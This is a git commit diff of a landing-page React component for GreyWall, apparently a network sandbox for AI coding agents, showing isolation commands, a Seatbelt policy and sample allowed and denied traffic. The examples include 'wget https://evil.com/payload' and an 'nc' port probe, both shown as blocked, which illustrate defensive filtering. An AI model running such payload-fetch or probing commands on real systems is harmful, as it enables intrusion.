monadical/greywall-landing-page
14
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

feat: small improvements

Browse Source
This commit is contained in:
Nik L
2026-03-09 13:50:23 -04:00
parent 4a1d666ee2
commit 15368fc0bd
5 changed files with 95 additions and 92 deletions
Download Patch File Download Diff File Expand all files Collapse all files

126
components/control.tsx
View File

@@ -91,66 +91,80 @@ export function Control() {
<h3 className="font-sans font-semibold text-sm">Network isolation</h3>
</div>
{platform === 'linux' ? (
<div className="space-y-3 text-sm font-serif">
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-red-400/70 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Full network namespace isolation</span> the
sandboxed process cannot see the host network at all.
</p>
<div className="space-y-4">
<div className="code-block p-4">
<div className="text-xs text-muted-foreground mb-2 font-sans uppercase tracking-wider">
Network namespace + TUN capture
</div>
<div className="font-mono text-xs space-y-1">
<div><span className="text-muted-foreground">bwrap</span> <span className="text-primary/80">--unshare-net</span> <span className="text-muted-foreground">\ </span></div>
<div className="ml-4"><span className="text-muted-foreground">tun2socks -device tun0 \</span></div>
<div className="ml-4"><span className="text-muted-foreground">-proxy</span> <span className="text-green-400/70">socks5://localhost:43052</span></div>
</div>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-primary mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">TUN device captures every packet</span> at the
kernel even binaries that ignore proxy env vars.
</p>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-green-400/70 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Domain-level filtering</span> via GreyProxy.
Allow specific domains, block everything else adjustable live.
</p>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-primary/50 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">DNS bridging</span> transparent DNS relay
ensures name resolution works inside the sandbox.
</p>
<div className="space-y-2 font-mono text-xs">
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">curl https://api.anthropic.com</span>
<span className="text-green-400/70 text-[10px]">TUN &rarr; PROXY &rarr; ALLOW</span>
</div>
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">npm install lodash</span>
<span className="text-green-400/70 text-[10px]">TUN &rarr; PROXY &rarr; ALLOW</span>
</div>
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">wget https://evil.com/payload</span>
<span className="text-red-400/70 text-[10px]">TUN &rarr; PROXY &rarr; DENY</span>
</div>
<div className="flex items-center justify-between py-1.5">
<span className="text-greyhaven-offwhite">nc -z 10.0.0.1 22</span>
<span className="text-red-400/70 text-[10px]">TUN &rarr; PROXY &rarr; DENY</span>
</div>
</div>
<p className="text-xs text-muted-foreground font-serif leading-relaxed">
Full network namespace isolation the process can&apos;t see the host network.
Every packet hits the TUN device and routes through GreyProxy, including
binaries that ignore proxy env vars.
</p>
</div>
) : (
<div className="space-y-3 text-sm font-serif">
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-red-400/70 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Seatbelt network rules</span> block all outbound
connections except to the proxy address.
</p>
<div className="space-y-4">
<div className="code-block p-4">
<div className="text-xs text-muted-foreground mb-2 font-sans uppercase tracking-wider">
Generated Seatbelt policy
</div>
<div className="font-mono text-xs space-y-1">
<div className="text-red-400/70">(deny default)</div>
<div className="text-muted-foreground">(deny network-outbound)</div>
<div className="text-green-400/70">
(allow network-outbound
</div>
<div className="text-green-400/70 ml-4">
(remote tcp &quot;localhost:43051&quot;))
</div>
</div>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-primary mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Proxy-based routing</span> via env vars. Traffic
from proxy-aware tools is filtered through GreyProxy.
</p>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-green-400/70 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Domain-level filtering</span> allow npm
registry and API hosts, block everything else.
</p>
</div>
<div className="flex items-start gap-3">
<div className="w-1.5 h-1.5 rounded-full bg-primary/50 mt-2 shrink-0" />
<p className="text-muted-foreground">
<span className="text-foreground">Localhost control</span> separate config for
port binding and local service access.
</p>
<div className="space-y-2 font-mono text-xs">
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">api.anthropic.com</span>
<span className="text-green-400/70 text-[10px]">VIA PROXY</span>
</div>
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">registry.npmjs.org</span>
<span className="text-green-400/70 text-[10px]">VIA PROXY</span>
</div>
<div className="flex items-center justify-between py-1.5 border-b border-border/20">
<span className="text-greyhaven-offwhite">evil.com (direct)</span>
<span className="text-red-400/70 text-[10px]">KERNEL DENY</span>
</div>
<div className="flex items-center justify-between py-1.5">
<span className="text-greyhaven-offwhite">analytics.vendor.io</span>
<span className="text-red-400/70 text-[10px]">PROXY DENY</span>
</div>
</div>
<p className="text-xs text-muted-foreground font-serif leading-relaxed">
All outbound traffic is blocked at the kernel. Only the proxy address is
reachable GreyProxy then applies domain-level allow/deny rules.
</p>
</div>
)}
</div>
@@ -203,7 +217,7 @@ export function Control() {
<div>
<span className="text-muted-foreground">$ </span>
<span className="text-greyhaven-offwhite">
{platform === 'linux' ? 'greywall --learning -- claude' : 'sudo greywall --learning -- claude'}
greywall --learning -- claude
</span>
</div>
<div className="text-muted-foreground mt-2">
@@ -227,7 +241,7 @@ export function Control() {
<p className="text-xs text-muted-foreground font-serif leading-relaxed">
{platform === 'linux'
? 'Uses strace to trace filesystem access. No special permissions needed. Auto-generates a template from observed paths.'
: 'Uses macOS Endpoint Security (eslogger) to trace access. Requires sudo for the trace, but the agent runs as your user. Generates a template automatically.'}
: 'Uses macOS Endpoint Security (eslogger) to trace access. Auto-generates a least-privilege template from observed paths.'}
</p>
</div>
</div>